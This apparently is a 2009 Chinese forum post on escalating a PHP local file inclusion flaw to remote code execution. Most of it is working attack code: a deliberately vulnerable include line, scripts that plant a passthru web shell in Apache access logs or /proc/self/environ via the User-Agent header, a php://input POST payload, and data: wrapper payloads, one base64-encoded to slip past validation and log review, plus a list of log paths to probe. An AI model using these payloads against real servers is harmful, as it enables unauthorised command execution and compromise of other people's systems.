|
|
之前曾写过一篇博文《LFI2RCE思路》:http://www.hxhack.com/bbs/read.php?tid-239750-keyword-LFI2RCE%CB%BC%C2%B7.html,本文主要是利用PHP代码来实现LFI2RCE,主要是看了《hack in zine》杂志之后学到的,这里顺便记录一下,但所使用的方法依然是上一博文中所提到的,即利用服务器上的相关记录文件来实现LFI2RCE。
在HIZ杂志中所用到的函数是passthru(http://cn2.php.net/passthru),主要还是为了实现一句话木马,当然也可使用exec 以及system等函数,三者之间的区别可参考《PHP 执行系统外部命令 system() exec() passthru()》:http://www.hxhack.com/bbs/read.php?tid-72431-keyword-%D6%B4%D0%D0%CF%B5%CD%B3%CD%E2%B2%BF.html
漏洞代码:
<?php include($_GET['content']); ?>
方法一:
请求代码如下:
<?php
$a = fsockopen("localhost",80);
fwrite ($a, "GET /<?php passthru(\$_GET['cmd']);?> HTTP/1.1\r\n".
"Host:localhost\r\n".
"Connection:Close\r\n\r\n");
fclose($a);
?>
接下来再依据服务器的日志文件路径执行请求,比如aphche,可执行以下请求:
http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id
当然也可有其它日志文件路径,比如:
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/httpd/access_log",
"/var/log/httpd/access.log",
"D:/apps/Apache Group/Apache2/logs/access.log"
方法二:
另外,也可利用包含环境变量的文件:/proc/self/environ ,而此时我们将恶意代码插入到User-Agent header中,那么在代码就会被记录到以上文件中,具体代码如下:
<?php
$a=fsockopen("localhost",80);
fwrite($a,
"GET /../../../../proc/self/environ HTTP/1.1\r\n".
"User-Agent: <?php passthru(\$_GET['cmd']); ?> \r\n".
"Host: localhost \r\n".
"Connection: Close\r\n\r\n");
fclose($a);
?>
方法三:
还有一种方法就是利用php://wrapper(http://www.php.net/wrappers.php),例如使用php://input来获取HTTP POST 请求中的原始数据并远程执行:
<?php
$request = "<?php passthru('id;'); ?>";
$req = "POST /index.php?content=php://input HTTP /1.1\r\n".
"Host:localhost\r\n".
"Content-type:text/html\r\n".
"Content-length:".strlen($request)."\r\n".
"Connection: Close\r\n\r\n".
"$request \r\n\r\n";
$a=fsockopen("localhost",80);
fwrite($a,$req);
echo $req;
while (!feof($a))
{ echo fgets($a,128); }
fclose($a);
?>
方法四:
利用"data:"wrapper(http://cn.php.net/manual/en/wrappers.data.php):
index.php?content=data:<?php system($_GET[c]); ?>?&c=dir
可再进行base64加密以绕过validation/sketchy logs:
index.php?content=data:;base64, \
PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir |
|
发表于 2009-7-9 10:21:32